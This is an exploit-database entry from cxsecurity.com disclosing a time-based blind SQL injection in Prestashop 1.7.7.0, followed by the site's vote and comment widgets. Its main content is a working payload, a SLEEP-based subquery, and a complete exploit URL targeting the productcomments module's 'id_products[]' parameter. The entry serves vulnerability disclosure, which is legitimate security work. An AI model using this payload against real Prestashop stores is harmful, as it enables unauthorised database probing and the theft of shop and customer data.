Prestashop 1.7.7.0 SQL Injection

2021.01.11
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection # Date: 08-01-2021 # Exploit Author: Jaimin Gondaliya # Vendor Homepage: https://www.prestashop.com # Software Link: https://www.prestashop.com/en/download # Version: Prestashop CMS - 1.7.7.0 # Tested on: Windows 10 Parameter: id_product Payload: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(5)))xoOt) Exploit: http://localhost/shop//index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(5)))xoOt)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top